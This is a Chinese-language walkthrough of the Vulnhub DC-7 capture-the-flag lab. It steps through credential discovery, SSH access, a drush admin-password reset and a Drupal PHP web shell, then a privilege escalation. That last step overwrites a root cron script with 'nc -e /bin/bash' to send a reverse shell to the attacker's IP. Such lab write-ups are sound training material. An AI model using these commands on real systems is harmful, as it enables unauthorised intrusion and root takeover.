zoukankan      html  css  js  c++  java
  • Vulnhub DC7

    靶机简介

    DC-7是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。虽然这不是一个过度的技术挑战,但也并非易事。虽然这是一个逻辑上的进展,从早期的DC版本(我不会告诉你是哪一个),有一些新的概念涉及,但你需要自己去弄清。:-)如果你需要使用暴力强制或字典攻击,你可能不会成功。你需要做的,就是跳出框框去思考。在盒子外面。:-)这个挑战的最终目标是获得root并阅读唯一的旗帜

    getshell

    老样子,先扫描一下端口

    又是22和80,看到ssh能猜到一会儿可能需要爆破进ssh。访问80

    根据靶机简介和这里的提示,说和之前的靶机DC-1有点新东西,具体新在哪儿呢?多了一个DC7USER

    百度这个关键字

    收集到一对账号密码 dc7user/MdR3xOgB7#dW

    前端登陆没成功,但试了试ssh居然就登进去了。。

    提权

    登陆进去后发现有邮箱信息,cat一下看是什么鬼

    看到X-Cron-Env联想到计划任务提权,具体的任务是啥?是邮件中的这个 Cron <root@dc-7> /opt/scripts/backups.sh,以root身份执行这个计划任务backups.sh。

    那就看看backups.sh

    没做什么事,尝试添加语句进行从而提升权限。但是发现当前用户无法修改,应该是权限原因

    ls -l 查看该文件的权限

    线索来了,文件所属的组是www-data,而且组是有写的权限的,该组的成员是www-data,那我们以www-data登陆不就行了?直接在web目录写shell,但是发现没有权限。这个时候我们想的应该是怎样在前台getshell,获取www-data的权限

    没有权限写入。那就先用drush修改admin密码,然后后台getshell。注意drush命令必须在www目录下使用

    cd /var/www/html
    drush user-password admin --password="admin"
    

    登入后台,添加页面,但是却发现没有php选项

    这啥意思?去官方下载一个加载php的插件

    导入

    然后勾选应用

    现在就可以添加php文件了

    page

    成功添加

    蚁剑连接

    nc反弹shell

    然后尝试修改定时任务,尝试了一下vi,无法移动光标,所以没法用vi写。这个时候换成echo,

    echo "nc -e /bin/bash 192.168.136.129 1234" > backups.sh

    监听1234端口,等待任务执行即可

    nc -lvvp 1234

    查看最后的答案

    总结

    1. 信息收集密码表
    2. drupal后台getshell
    3. groups www-data查看用户组的用户
  • 相关阅读:
    【转】微信中MMAlert(半透明底部弹出菜单)的使用介绍
    工厂模式
    装饰者模式
    观察者模式
    策略模式
    Android 自定义ViewGroup,实现侧方位滑动菜单
    【转】Android Android属性动画深入分析
    Android ActionBar仿微信界面
    书籍:《沧浪之水》、《盜墓筆記1-8全集》、《鬼 吹 灯(1-8加续)》、《流浪地球》、《二号首长1-5》
    FROM_UNIXTIME 格式化MYSQL时间戳函数
  • 原文地址:https://www.cnblogs.com/tlbjiayou/p/13978804.html
Copyright © 2011-2022 走看看